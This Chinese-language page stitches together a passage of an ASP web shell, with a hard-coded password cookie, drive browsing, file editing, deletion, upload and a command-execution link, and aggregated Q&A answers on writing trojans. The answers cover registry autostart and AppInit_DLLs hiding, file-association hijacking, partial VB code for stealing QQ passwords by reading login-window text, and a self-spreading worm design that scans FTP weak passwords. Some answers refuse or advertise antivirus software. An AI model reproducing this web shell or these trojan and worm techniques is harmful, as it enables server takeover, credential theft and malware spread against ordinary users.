window.open("<%=rseb%>?q=edit.asp&path=" & ls & "&op=del&attrib=<%=request("attrib")%>")
end if
end sub
sub rmdir(ls)
if confirm("你真的要删除这个目录吗!"&Chr(13)&Chr(10)&"目录为:"&ls) then
window.open("<%=rseb%>?q=edir.asp&path="&ls&"&op=del&attrib=<%=request("attrib")%>")
end if
end sub
sub copyfile(sfile)
dfile=InputBox("※文件复制※"&Chr(13)&Chr(10)&"源文件:"& sfile&Chr(13)&Chr(10)&"输入目标文件的文件名:"&Chr(13)&Chr(10) &"[允许带路径,要根据你的当前路径模式]")
dfile=trim(dfile)
attrib="<%=request("attrib")%>"
if dfile<>"" then
if InStr(dfile,":") or InStr(dfile,"/")=1 then
lp=""
if InStr(dfile,":") and attrib<>"true" then
alert "对不起,你在相对路径模式下不能使用绝对路径"&Chr(13)&Chr(10)&"错误路径:["&dfile&"]"
exit sub
end if
else
lp="<%=lpath%>"
end if
window.open("<%=rseb%>?q=edit.asp&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp+dfile)
else
alert"您没有输入文件名!"
end If
end sub
</script>
<body>
<table border="1" width="100%" cellpadding="0" height="81" bordercolorlight="#000000"
bordercolordark="#FFFFFF" cellspacing="0">
<tr>
<td width="755" bgcolor="#000080" colspan="2" height="23"><p align="center"><font size="3"
color="#FFFFFF"><%=httpt%></font></td>
</tr>
<tr>
<td width="751" bgcolor="#C0C0C0" colspan="2">※换盘:<span
style="background-color: rgb(255,255,255);color:rgb(255,0,0)"><%
For Each thing in oFileSys.Drives
Response.write "<font face=Wingdings>:</font><a href='" & rseb & "?q=list.asp&path="&thing.DriveLetter&":&attrib=true'>"&thing.DriveLetter&":</a>"
NEXT
%> </span> 地址:
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %></td>
</tr>
<tr>
<td width="751" bgcolor="#C0C0C0" colspan="2">※<%
if Request("attrib")="true" then
response.write "<a href='" & rseb & "?q=list.asp'>切到相对路径</a>"
else
response.write "<a href='" & rseb & "?attrib=true&q=list.asp'>切到绝对路径</a>"
end if
%> ※绝对:<span
style="background-color: rgb(255,255,255)"><%=cpath%></span></td>
</tr>
<tr>
<td width="751" bgcolor="#C0C0C0" colspan="2">※当前<font color="#FF8000"><font face=Wingdings>1</font></font>:<span style="background-color: rgb(255,255,255)"><%=lpath%></span> </td>
</tr><form name="form1" method="post" action="<%=rseb%>?q=upfile.asp" target="_blank" enctype="multipart/form-data">
<tr><td bgcolor="#C0C0C0" colspan="2" style="height: 20px">
编辑|
<input class="tx1" type="text" name="filename" size="20">
<input class="tx1" type="button" value="建文" onclick="crfile(form1.filename.value)">
<input class="tx1" type="button" value="建目" onclick="crdir(form1.filename.value)">
<input type="file" name="file1" class="tx1" style="width:100" value="">
<input type="text" name="filepath" class="tx1" style="width:100" value="<%=cpath%>">
<input type="hidden" name="act" value="upload">
<input type="hidden" name="upcount" class="tx" value="1">
<input class="tx1" type="submit" value="上传">
<input class="tx1" type="button" onclick="window.open('<%=rseb%>?q=cmd.asp','_blank')" value="命令">
<input class="tx1" type="button" onclick="window.open('<%=rseb%>?q=test.asp','_blank')" value="配置">
<input class="tx1" type="button" onclick="window.open('<%=rseb%>?q=p.asp','_blank')" value="nfso">
</td>
</td>
</tr></form>
<tr>
<td width="169" valign="top" bgcolor="#C8E3FF"><%Call GetFolder()%>
</td>
<td width="582" valign="top" bgcolor="#FFefdf"><%Call GetFile()%>
</td>
</tr>
</table>
<%else
response.write "Password Error!"
response.write "<a href='" & rseb & "?q=" & rseb & "'>【返 回】</a>"
end if
%>
</body>
</html>
<%case "edit.asp"%>
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80">
<title>编辑源代码</title>
<style>
<!--
table font-family: 宋体; font-size: 12pt
a font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none
a:hover font-family: 宋体; color: rgb(255,0,0); text-decoration: underline
a:visited color: rgb(128,0,0)
-->
</style>
</head>
<body>
<% '读文件
if Request.Cookies("password")="7758521" then
if request("op")="del" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile.Delete True
Response.write "<script>alert('删除成功!要刷新才能看到效果');window.close();</script>"
else
if request("op")="copy" then
if Request("attrib")="true" then
whichfile=Request("path")
dsfile=Request("dpath")
else
whichfile=server.mappath(Request("path"))
dsfile=Server.MapPath(Request("dpath"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile.copy dsfile
%>
<script language=vbscript>
msgbox "源文件:<%=whichfile%>" & vbcrlf & "目的文件:<%=dsfile%>" & vbcrlf & "复制成功!要刷新才能看到效果!"
window.close()
</script>
<%
else
if request.form("text")="" then
if Request("creat")<>"yes" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.OpenTextFile(whichfile, 1, False)
counter=0
thisline=thisfile.readall
thisfile.Close
set fs=nothing
end if
%>
<form method="POST" action="<%=rseb%>?q=edit.asp">
<input type="hidden" name="attrib" value="<%=Request("attrib")%>"><table border="0"
width="700" cellpadding="0">
<tr>
<td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><%=httpt%></td>
</tr>
<tr align="center">
<td width="100%" bgcolor="#FFDBCA">文件名:<input type="text" name="path" size="45"
value="<%=Request("path")%> ">直接更改文件名,相当于“另存为”</td>
</tr>
<tr align="center">
<td width="100%" bgcolor="#FFDBCA"><textarea rows="25" name="text" cols="90"><%=thisline%></textarea></td>
</tr>
<tr align="center">
<td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><input type="submit"
value="提交" name="B1"><input type="reset" value="复原" name="B2"></td>
</tr>
</table>
</form>
<%else
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set outfile=oFileSys.CreateTextFile(whichfile)
outfile.WriteLine Request("text")
outfile.close
set fs=nothing
Response.write "<script>alert('修改成功!要刷新才能看到效果');window.close();</script>"
end if
end if
end if
else
response.write "Password Error!"
response.write "<a href='" & rseb & "?q=" & rseb & "'>【返 回】</a>"
end if
%>
</body>
</html>
<%case "edir.asp"%>
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80">
<title>目录操作</title>
<style>
<!--
table font-family: 宋体; font-size: 12pt
a font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none
a:hover font-family: 宋体; color: rgb(255,0,0); text-decoration: underline
a:visited color: rgb(128,0,0)
-->
</style>
</head>
<body>
<% '读文件
if Request.Cookies("password")="7758521" then
if request("op")="del" then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.DeleteFolder whichdir,True
Response.write "<script>alert('删除的目录为:" & whichdir & "删除成功!要刷新才能看到效果');window.close();</script>"
else
if request("op")="creat" then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.CreateFolder whichdir
Response.write "<script>alert('建立的目录为:" & whichdir & "建立成功!要刷新才能看到效果');window.close();</script>"
end if
end if
else
response.write "Password Error!"
response.write "<a href='" & rseb & "?q=" & rseb & "'>【返 回】</a>"
end if
%>
</body>
</html>
<%
case "upfile.asp"
if Request.Cookies("password")="7758521" then
set upload=new upload_5xSoft
if upload.form("filepath")="" then
HtmEnd "请输入要上传至的目录!"
set upload=nothing
response.end
else
formPath=upload.form("filepath")
if right(formPath,1)<>"/" then formPath=formPath&"/"
end if
iCount=0
for each formName in upload.objForm
set file=upload.file(formName)
if file.FileSize>
如何编写木马程序?
参考技术A 怎样编写木马程序您好
建议您不要去学习使用木马病毒,是属于违法犯罪行为。而且,如果您接收了木马病毒,那么该病毒会自动在您的电脑中优先运行。
建议您到腾讯电脑管家官网下载一个电脑管家。
在平时使用电脑的时候,打开电脑管家,可以受到电脑管家16层实时防护的保护和云智能预警系统,可以在木马活动早期侦测并阻断木马的破坏行为,通过云查杀技术秒杀最新流行木马。
如果还有其他疑问和问题,欢迎再次来电脑管家企业平台进行提问,我们将尽全力为您解答疑难
腾讯电脑管家企业平台:zhidao.baidu/c/guanjia/
如何编写木马程序??
你想干什么?如果你只想玩玩,建议你学一下vbs脚本或bat脚本,如果你想把脚本做成exe程序,最简单的方法就是把脚本压缩到自解压文件里,再用16进制编辑器修改一下某个数值,就成功了。
如果你想干坏事,嘻嘻,木马也不是那么好写的,首先你要成为一个出色的程序员,不仅要打好C语言基础,更要精通汇编语言和计算机硬件以及操作系统原理,逻辑思维要强,当然要学的还很多,如mfc,C#等等,所以,如果你不是非常痴迷于编程,我劝你玩玩就行了,当然,更不要走上违法犯罪的道路吆!
good luck。
呀,还有,请采纳我吧,宝贝儿,嘻!
如何编写木马程序
如果对电脑感兴趣的话可以学习下,一般软件开发工程师都是学的高级语言,但是如果写木马,我们一般是要接触低级语言的,低级语言比高级语言学起来枯燥,但学成之后进阶高级语言很快而且比一般的程序员牛逼,高级语言配合底层知识才能写出更好的木马。底层知识越牢固越好。
怎样才能编程木马程序
北上广深这么多程序员,怎么没几个搞这种编程的?
一个原因就是没钱赚,另一个原因就是技术上要求太高。
好好的学编程,从你提这个问题来看,你都还没入门吧。
慢慢学,你会发现学得越多自己越无知,等你有五年以上开发经验的时候,再来看你现在的这个提问的时候,一定会笑话这个时候的自己的。
祝你在开发的路上快速成长!
木马是如何编写的(三)
很高兴为您解答:
木马编写是需要你懂的C++语言
首先是程序的大小问题,本程序经编译链接后得到的可执行文件竟有400多K,用Aspack1.07压了一下也还有200多K。可以看出不必要的Form是应该去掉的;并且尽量由自己调用底层的API函数,而尽量少使用Borland打好包的VCL控件;要尽量使用汇编语言(BCB支持C++和汇编混编),不但速度会加快,而且大小可以小很多,毕竟木马是越小越好。
还有启动方式的选择。出了Win.ini、System.ini之外,也还是那几个注册表键值,如:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
都已被其他的木马用烂了。现在又开始对exe、dll和txt文件的关联程序动手脚了(如冰河和广外女生)。这里涉及到参数传递的问题。得到ParamStr()函数传来的参数,启动自己后再启动与之关联的程序,并将参数传递给它,这样就完成了一次“双启动”,而受害者丝毫感觉不到有任何异常。具体键值如:
与exe文件建立关联:HKEY_CLASSES_ROOT\exefile\shell\open\mand
与txt文件建立关联:HKEY_CLASSES_ROOT\txtfile\shell\open\mand
与dll文件建立关联:HKEY_CLASSES_ROOT\dllfile\shell\open\mand
等,当然还可以自己扩充。目前还有一种新方法:在
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Windows
下添加如下键值 "AppInit_DLLs"="Server.dll",这就把Server.dll注册为系统启动时必须加载的模块(你应该把木马编译成DLL)。下次开机时,木马以动态链接库形式被加载,存在于系统进程中。因为没有它自己的PID(Process ID 进程识别号),所以在NT的任务管理器中也看不见(不过在“系统信息”——“软件环境”——“已加载的32位模块”中还是可以详细看到当前内存中加载的每一个模块的),这样做的目的是可以使自己的程序更加隐蔽,提高木马的生存能力。
木马的功能还可以大大扩充。你可以充分发挥你的想象力——比如上传、下载、新建、改名、移动文件,截图存为jpg文件传回,录音监听成Wav文件,录像成AVI文件,弹光驱,读软驱,关机,重启,不停地挂起,胡乱切换分辨率(烧掉你的显示器),发对话框,不停地打开资源管理器直到死机,杀掉Kernel32.dll进程使机器暴死,交换鼠标左右键,固定鼠标,限制鼠标活动范围,鼠标不听指挥到处乱窜,记录击键记录(记录上网口令,这需要深入了解钩子(Hook)技术,如键盘钩子和鼠标钩子),窃取......
编写木马?
盗号木马~~~~楼主,这不是好玩的东西,不过看在高分悬赏的份上,就告诉你吧。 可以通过 SendMessage 发送 WM_GETTEXT 取得密码框中的值,我们可以利用这一点来完成密码的截取。 使用 Timer 控件,监视QQ。 用遍查窗口的方法(EnumWindows),取得所有的窗口标题(GetWindowText),判断其中是否为"QQ用户登录"的标题,取 得QQ登录窗口的子窗口(窗口上的控件)的类名(GetClassName),然后通过 boBox、Edit 取得用户名和密码(通过 SendMessage 发送 WM_GETTEXT 取得值)。 由于不能判断外部按键事件的发生,只有通过不断的取得密码值,具体方法如下: 首先取得 用户名的值,然后不停的取密码的值,再判断窗口的标题是否为用户名,如果为用户名,则最后一次密码的值就是真正的密码,到此程序完成。 程序编制 (1)首先为了避免程序被多次装载,造成系统资源的浪费、及不必要的错误。 声明变量、过程及 API 函数,写在 Module1.bas 文件中 Declare Function CreateFileMapping Lib "kernel32" Alias "CreateFileMappingA" (ByVal hFile As Long, lpFileMappigAttributes As SECURITY_ATTRIBUTES, ByVal flProtect As Long, ByVal dwMaximumSizeHigh As Long, ByVal dwMaximumSizeLow As Long, ByVal lpName As String) As Long '创建一个新的文件映射对象
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long '关闭一个内核对象
Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Const PAGE_READWRITE = 1
Const ERROR_ALREADY_EXISTS = 183&
建立判断程序是否多启动的过程
Sub Main()
Dim ynRun As Long
Dim sa As SECURITY_ATTRIBUTES
sa.bInheritHandle = 1
sa.lpSecurityDescriptor = 0
sa.nLength = Len(sa)
ynRun = CreateFileMapping(&HFFFFFFFF, sa, PAGE_READWRITE, 0, 128, App.title) '创建内存映射文件
If (Err.LastDllError = ERROR_ALREADY_EXISTS) Then '如果指定内存文件已存在,则退出
CloseHandle ynRun '退出程序前关闭内存映射文件
End
End If
End Sub
(2)即时监视,就需要在系统启动时,程序自启动,这里使用修改注册表的方法 声明变量、过程及 API......
木马程序是怎么编出来的
一个典型的蠕虫病毒有两个功能型部件:传播和破坏,流行的蠕虫病毒大都是利用操作系统或者应用程序的漏洞(以弱口令和溢出最为常见),但常常并不会对宿主机造成“致命”的破坏。这两个特点使蠕虫病毒比普通电脑病毒传播得更快,影响力更大。一般来说,单一的蠕虫病毒只针对某种特定的漏洞进行攻击,所以一旦这种漏洞得到大范围修补,病毒也就没有了生存空间。
更新这种设计,我把传播部件拆分开来:把扫描、攻击和破坏脚本化,主程序则负责解析这些脚本。例如针对ftp弱口令进行扫描,我们可以定义如下脚本:
code:
uid = iscript-0a21-2331-x #随机唯一编号
using tcp;
port 21;
send “user anonymous”;
send crlf;
send “pass [email protected]”
send crlf;
if (find “200”) resulrt ok;
next;
[copy to clipboard]
解析了这段脚本后(我想这种脚本是很容易读懂的),我们再定义一系列的过程,把我们的蠕虫体upload上去,一次完整的传播动作就完成了。如果是溢出漏洞,为了简单起见我们可以采集远程溢出的数据包,然后修改ip地址等必要数据,再转发溢出数据包进行溢出(这种情况下要实现connect-back就不容易了,不过这些具体问题就待有心人去研究吧),例如:
code:
using raw;
ip offset at 12;
send “\x1a\xb2\xcc” ……
[copy to clipboard]d
主程序在完成传播后留下一个后门,其他宿主机可以通过这个后门与本地的蠕虫病毒同步传播脚本,这样每次有新的漏洞产生,宿主机的传播方式可以很快地得到升级。我们当然不会仅满足于这样一个蠕虫程序,扫描/攻击脚本的传播过程也是需要仔细处理的。
我们希望适应力(fitness)最强的脚本得到广泛的应用(看起来有点类似 蚁群算法 和 ga),所以我们要求得每个个体的fitness,当它和另一个体取得联系的时候就可以决定谁的传播脚本将取代另一个:
fitness = number of host infected / number of host scanned
但也不能仅凭fitness就修改传播脚本,我个人觉得一个合适的概率是75%,20%的机会保持各自的传播脚本,剩下的5%则交换脚本。这样在维持每种脚本都有一定生存空间的情况下使适应性最好的个体得到更多的传播机会,同时,一些在某种网络环境下适应性不强的脚本也有机会尝试不同的网络环境。
木马程序是怎么写出来的?
您好:
建议您不要编写木马程序,木马程序会对您和别人的电脑造成损害的,如果您曾编写过此类不安全的软件的话,为了您电脑的安全,建议您使用腾讯电脑管家对您的电脑进行一下全面的杀毒吧,打开腾讯电脑管家中的杀毒功能选择闪电查杀或者全盘查杀就可以,您可以点击这里下载最新版的腾讯电脑管家:最新版腾讯电脑管家下载
腾讯电脑管家企业平台:zhidao.baidu/c/guanjia/
怎么制作木马程序?
你需要学会编程才能编写木马编写木马最好用vc++。enet/eschool/video/c++/ 这是c++的教程,你学懂了这些皮毛的东西再深入研究内核编程吧如果上面的地址打不开可以到这里pconline/pcedu/empolder/gj/vc/0607/820674
怎么编写一个简单的木马程序?
特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷, 使在Dos——Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。
我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!要知道,木马(Trojan)的历史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木马是由一些玩程式(主要是C)水平很高的年轻人(主要是老美)用C或Shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。那时木马的主要方法是诱骗——先修改你的.profile文件,植入木马;当你登陆时将你敲入的口令字符存入一个文件,用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的薰陶下长大的,对网络可以说很陌生。直到Win9x横空出世,尤其是WinNt的普及,大大推动了网络事业的发展的时候,BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马(甚至在Win9x的“关闭程序”对话框可以看到进程)给了当时中国人极大的震撼,它在中国的网络安全方面可以说是一个划时代的软件。
自己编写木马,听起来很Cool是不是?!木马一定是由两部分组成——服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是TCP/IP协议)。为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。
首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗?
启动C++Builder 5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。
Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。
我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的......
以上是关于木马程序源码的主要内容,如果未能解决你的问题,请参考以下文章